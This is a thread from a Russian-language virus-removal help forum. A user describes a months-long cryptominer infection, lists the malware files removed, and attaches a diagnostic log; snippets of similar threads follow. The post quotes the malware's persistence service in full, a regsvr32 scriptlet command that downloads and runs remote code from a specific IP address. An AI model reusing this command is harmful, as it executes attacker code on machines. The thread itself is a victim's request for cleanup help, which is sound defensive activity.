Перейти к содержанию
Правила раздела

Поймал вирус (предположительно майнер)

Igo108

Автор Igo108
в Помощь в удалении вирусов

 Поделиться

Рекомендуемые сообщения

Igo108

Igo108

Опубликовано
Опубликовано

Здравствуйте. Антивирус в системе не стоит, т.к. слабенькая.
На винчестере три раздела и два Windows - XP и Vista. В основном работаю на С: под ХР.
Поймал вирус (предположительно майнер) еще летом 2021 года. Прошло уже больше 3-х месяцев.
Грузит систему периодически до 100%.
Часть вируса удалил в начале осени, но вижу, что не всё. Удалил (возможно не всё перечислил):
a.bat
conhoy.exe
CONHOY.EXE-1EC51B50.pf11
shell.rar
c:\WINDOWS\Debug\item.dat
c:\WINDOWS\inf\aspnet\lsma12.exe
c:\System Volume Information\_restore{6B76C70F-5D28-4A66-9153-CE979AEAF7D5}\RP129\A0091495.INI  62байта
??? c:\WINDOWS\system32\n1.dat

Служба apzZ
C:\WINDOWS\system32\regsvr32.exe
apzZ    12%    apzZ    Auto on startup    Сервер регистрации, (C) Microsoft    Корпорация Майкрософт    cmd /c regsvr32 /s /u /n /i:http://185.47.128.124:8124/m17010.txt scrobj.dll    2021-08-29 14:07    own process    

Trojan.BitCoinMiner.TskLnk, C:\WINDOWS\inf\aspnet\lsma12.exe


В процессе работы над отчетом блокировался доступ к вэб-сайтам антивирусов.
Периодически в текстовых окнах само печатало длинный текст testtest......testtest.txt и также другой текст.
Также зависала система и испортился Malwarebytes.

По теме загрузки отчета есть несколько замечаний. При попытке запустить AutoLogger (скачанный по ссылке из Правил оформления) пишет "Пожалуйста, скачайте свежую версию автосборщика логов". В файле Date.ini из папки AutoLogger\AV поменял вручную дату на более близкую - только тогда AutoLogger запустился. Думаю, нужно в выложенном для скачивания архиве периодически менять дату в файле Date.ini на более актуальную.
И ещё. Базы обновить невозможно, так как пункт обновления в меню Файл не активен.

Буду благодарен за помощь.

тут лог

CollectionLog-2022.01.07-14.36.zip

Ссылка на комментарий
Поделиться на другие сайты
  • thyrex закрыл тема
Гость
Эта тема закрыта для публикации ответов.
 Поделиться
Перейти к списку тем

  • Похожий контент

    • BMO
      [РЕШЕНО] Поймал вирус майнер RealtekHD\taskhost.exe (taskhostw.exe)
      Автор BMO
      FRST.zip
      При даже включенном касперском открывается браузер хром, далее кликер или что-то в этом роде начинает смотреть ютуб (без шуток). Данный браузер открыть не могу, ток закрыть и видеть в трее. При этом курсор мыши остается блокированным для меня, пока не закрою браузер.
      До установки касперского невозможно было зайти в ProgrammData
    • DanilDanil
      Поймал на VM шифровальщик. Предположительно Mimic (N3ww4v3)
      Автор DanilDanil
      Словил на VM шифровальщик. GPT в deepsearch предположил, что это mimic ( N3ww4v3) - на основе проанализированных зашифрованных файлов и оставленной злоумышленниками записке. Зашифрованны базы данных. Бэкапов не было...
      Есть ли возможность дешифровать? Вот это оставили злоумышленники. Зашифрованный файл прикрепить не могу, форум ограничивает.
      Important_Notice.txt
    • user344
      Поймал майнер или троян
      Автор user344
      Здравствуйте! Недавно компьютер в простое начинает переодически нагружаться до 100%, вентиляторы начинают крутить на полную в течении 5-10 минут, только начинаешь водить мышкой по рабочему столу, то сразу же нагрузка падает до дефолтных значений. Проверял лечащай утилитой др.веб и kvrt они вирусов не нашли.
      CollectionLog-2025.06.25-21.11.zip
    • lostintired
      Вирус-майнер CAAServices.exe
      Автор lostintired
      Здравствуйте!
       
      Обращаюсь за помощью в полном удалении вредоносного ПО. Ранее на компьютере был обнаружен вирус, связанный с процессом CAAService.exe, который осуществлял майнинг. На тот момент мне удалось остановить вредоносную активность, и майнинг-процессы больше не наблюдаются.
      Однако, несмотря на это, файл CAAService.exe продолжает самовосстанавливаться по следующему пути: "C:\ProgramData\CAAService\CAAService.exe"
       
      Удалял вручную — файл вновь появляется сам, также сам себя добавляет в исключения защитника Windows. Также пытался выполнить рекомендации, приведённые в ТЕМЕ, но проблема не была полностью решена — папка и исполняемый файл восстанавливаются.
      Прошу помощи в полном удалении остаточных компонентов этой угрозы. Готов предоставить все необходимые логи и выполнить диагностику согласно требованиям форума.
      Заранее благодарю за помощь.
      CollectionLog-2025.07.18-23.17.zip
      Addition.txt FRST.txt
    • Snedikk
      Поймал майнер tool.btcmine.2812
      Автор Snedikk
      Добрый день! 
      Поймал вирус-майнер tool.btcmine.2812. Недавно был похожий троян, но по рекомендациям с данного форума удалось его удалить посредством утилиты AVZ. Затем какое-то время все было хорошо. Сегодня решил проверить комп на наличие вирусов утилитой DrWeb CureIt и сия програмка показала наличие вредоносного червячка. Пробовал удалять его самой утилитой от DrWeb, но после перезагрузки он восстанавливается и все приходится делать снова. По инструкции просканировал комп и логи прикладываю к теме. Будьте добры помочь, люди. Заранее огромная благодарность
      CollectionLog-2025.06.20-19.07.zip

×
×
  • Создать...